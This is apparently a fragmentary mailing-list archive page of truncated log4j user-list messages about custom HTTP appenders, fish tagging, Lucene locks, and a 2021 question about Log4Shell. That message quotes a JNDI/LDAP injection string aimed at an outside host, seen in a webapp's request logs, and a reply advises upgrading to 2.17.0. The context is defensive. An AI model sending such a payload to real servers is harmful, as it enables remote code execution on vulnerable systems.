egory:
Michael,
First, please make sure you are using our latest and greatest, currently 2.17.0.
https://logging.apache.org/log4j/2.x/download.html
I don't want to spread the FUD here, but if you search the web for
"Log4Shell", you should find POCs.
TY!
Gary
On Sat, Dec 18, 2021 at
Hi
I have a webapp running using log4j and I can see various requests
containing jndi, e.g.
http://HOSTNAME/$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D
whereas it is not clear to me whether the attack was successful.
Does anyone know how I could attack my own s
Hi
We have also written a custom appender, whereas you can find a sample
configuration at
https://github.com/wyona/yanel/blob/master/conf/log4j.properties
Look for
com.wyona.boost.log4jappender.HTTPAppenderV1
you will get the library Log4JAppender-4.9.0-r0ec55e61af5.jar when for
example instal
Am 01.05.14 17:18, schrieb Ralph Goers:
> I guarantee you, on a busy system with lots of logging sending a SOAP message
> for every event will be a problem.
I can second/confirm that.
We have developed such an appender in order to log user requests for
user tracking and personalization
https:/
thanks very much for your feedback. Will have a closer look at it and
send some feedback
once I have made some more progress on it.
Thanks
Michael
Am 11.03.14 13:47, schrieb Matt Sicker:
> On Monday, 10 March 2014, Michael Wechner wrote:
>
>> Am 10.03.14 13:34, schrieb Matt Sic
tom plugin are you using?
I am not sure I understand your question, can you explain some more?
(Our custom appender to send messages via HTTP is still based on log4j
version 1)
Thanks
Michael
>
> On Monday, 10 March 2014, Michael Wechner wrote:
>
>> Hi
>>
>> I
Hi
I am using log4j within the Yanel CMS (http://www.yanel.org) for regular
debugging, but
also for logging of 404 and access.
I have recently upgraded part of the code to log4j2 in order to use fish
tagging, which works very fine.
Also I am using log4j to send messages via HTTP (and ActiveMQ me
Hi Curt
Hi Nick
Thanks very much for the pointer to "fish tagging" and the explanations
accordingly.
Best wishes
Michael
Am 24.07.13 16:53, schrieb Nick Williams:
On Jul 24, 2013, at 9:35 AM, Michael Wechner wrote:
Hi
We are using log4j for many years now for our open
Hi
We are using log4j for many years now for our open source CMS
www.yanel.org and it works really great
and I really would like to thank everyone who contributed to log4j.
Over the years we are experiencing that more and more people are using
our software, which is very nice, but
it also mak
a space in the log records and rewrite them with
a marker (e.g. "*") in that space once the files have be indexed to mark
them as "deleted" or "handled" as the case may be.
On Thu, 2011-12-15 at 08:59 +0100, Michael Wechner wrote:
Hi
As some of you might now
Hi
As some of you might now Apache Lucene creates a "write.lock" when an
IndexWriter is updating the index,
hence it can happen that another IndexWriter (inside another thread)
won't be able to update the same index at the same time and based on a
specific timeout something might not get index
11 matches
Mail list logo